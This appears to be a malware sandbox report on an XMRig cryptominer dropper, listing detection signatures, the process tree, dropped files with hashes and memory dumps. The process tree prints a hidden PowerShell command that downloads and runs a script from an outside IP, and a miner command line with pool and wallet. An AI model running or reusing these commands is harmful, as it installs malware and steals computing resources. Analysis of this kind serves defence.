Analysis

  • max time kernel
    148s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 00:51

General

  • Target

    7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe

  • Size

    120KB

  • MD5

    5b3ed060facb9d57d8d0539084686870

  • SHA1

    9cae8c44e44605d02902c29519ea4700b4906c76

  • SHA256

    7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207

  • SHA512

    6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

  • SSDEEP

    3072:EV3J6kkt5h1X+HqTi0BW69hd1MMdxPe9N9uA0/+hL9TBfnPQT:pt5hBPi0BW69hd1MMdxPe9N9uA069TB6

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 21 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe
      "C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3668
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat C:\Users\Admin\AppData\Local\Temp\7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3424
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2156
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8131.tmp" "c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP"
                7⤵
                  PID:4556
      • C:\Windows\System32\notepad.exe
        --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:3232
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4220
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4900
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:376
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:2268
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3012
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:3592
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4504
      • C:\Windows\system32\tasklist.exe
        tasklist /FI "PID eq 3232"
        2⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4832

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      8d80c45e0e047b75073a3d1c2710c68f

      SHA1

      babc73cf30327b36d184239a2747ec94d48929f4

      SHA256

      6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

      SHA512

      5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

    • C:\Users\Admin\AppData\Local\Temp\46F7.tmp\46F8.tmp\46F9.bat

      Filesize

      334B

      MD5

      3895cb9413357f87a88c047ae0d0bd40

      SHA1

      227404dd0f7d7d3ea9601eecd705effe052a6c91

      SHA256

      8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785

      SHA512

      a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

    • C:\Users\Admin\AppData\Local\Temp\RES8131.tmp

      Filesize

      1KB

      MD5

      06e81bf18ee9d7d04d1a1bec9bb8d704

      SHA1

      70b92705bad7b26a852cdb05335687254d709cf7

      SHA256

      86b3139a88eb85a774443c88d337e6b6c53ce3b80fac62ba8a725aa3991fca6c

      SHA512

      f002720416d70032708beafef9f94e52d224f1cbe03eb0b6ceac333283c511f589d4d23eba231a04e6979cc2d9b37ddde96625c7bbc6d77eacb617cac0974ade

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uswhg4kw.r1n.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\installer.ps1

      Filesize

      11.4MB

      MD5

      b6d611af4bea8eaaa639bbf024eb0e2d

      SHA1

      0b1205546fd80407d85c9bfbed5ff69d00645744

      SHA256

      8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b

      SHA512

      d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

    • C:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.dll

      Filesize

      3KB

      MD5

      c339446662f8edacaf1ec7c656dbd534

      SHA1

      d4f33a03f783ac9e61de9a18c7d1acf06e42a40d

      SHA256

      dd318d287160f76fec13d425f09cbedbe4f5ef4ac258687fe1253377a56622f7

      SHA512

      a61348accdae412676c4e67d68d088cf4a936703ac890ef3fa23fcd7c654807cb12ea75ad5e9cc8b8f3f5edabb1ce904eaae4f0aae34117cb79e525a5de96f33

    • \??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\CSCE9117C56EC3B443CB6266D21B26C1192.TMP

      Filesize

      652B

      MD5

      021866765f724ce1504a96a6491f3c9b

      SHA1

      964643f1f53eac3d8f6e53032182ccd0afba25f9

      SHA256

      907817b4529748d5114146221a9488a3985d098c7aedec565c26d2a5b641cfbc

      SHA512

      d590b44088ade2521fb3cad1add6bdd55698822dffe24f43b9d4f8b4c593b80f6eac02de716a557dc175e6c5dea5cbb6b04a72cbf5c385636116f6919bc86911

    • \??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.0.cs

      Filesize

      941B

      MD5

      1809fe3ba081f587330273428ec09c9c

      SHA1

      d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9

      SHA256

      d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457

      SHA512

      e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

    • \??\c:\Users\Admin\AppData\Local\Temp\uyzv4noq\uyzv4noq.cmdline

      Filesize

      369B

      MD5

      807f0a5dfb7b5d0671639060841ddfae

      SHA1

      17b188d1a8429273ef0c8425ce65d31e5b88dd27

      SHA256

      56fc36bf83529bd8a78d2965a890e35f309e4948d2de904a7856c3d976371bd4

      SHA512

      2611cbefa22cce53bf494dc361604fec9ade10237a0bcb1cf9013a709b517edd9e230f1a00087e04cc1aa3877fadeb3bb6a9840ebe73ad70c6c553fac6c351c2

    • memory/2264-13-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2264-20-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2264-16-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2264-15-0x00007FFBF4003000-0x00007FFBF4005000-memory.dmp

      Filesize

      8KB

    • memory/2264-14-0x00007FFBF4000000-0x00007FFBF4AC1000-memory.dmp

      Filesize

      10.8MB

    • memory/2264-12-0x0000014FADD30000-0x0000014FADD52000-memory.dmp

      Filesize

      136KB

    • memory/2264-2-0x00007FFBF4003000-0x00007FFBF4005000-memory.dmp

      Filesize

      8KB

    • memory/3232-55-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-70-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-54-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-82-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-64-0x000002159E7E0000-0x000002159E800000-memory.dmp

      Filesize

      128KB

    • memory/3232-63-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-66-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-68-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-67-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-65-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-69-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-81-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-71-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-72-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-73-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-74-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-75-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-76-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-77-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-78-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-79-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3232-80-0x00007FF6B8900000-0x00007FF6B91C4000-memory.dmp

      Filesize

      8.8MB

    • memory/3424-45-0x0000026EB3B80000-0x0000026EB3B88000-memory.dmp

      Filesize

      32KB

    • memory/3448-47-0x000000000D5A0000-0x000000000DE23000-memory.dmp

      Filesize

      8.5MB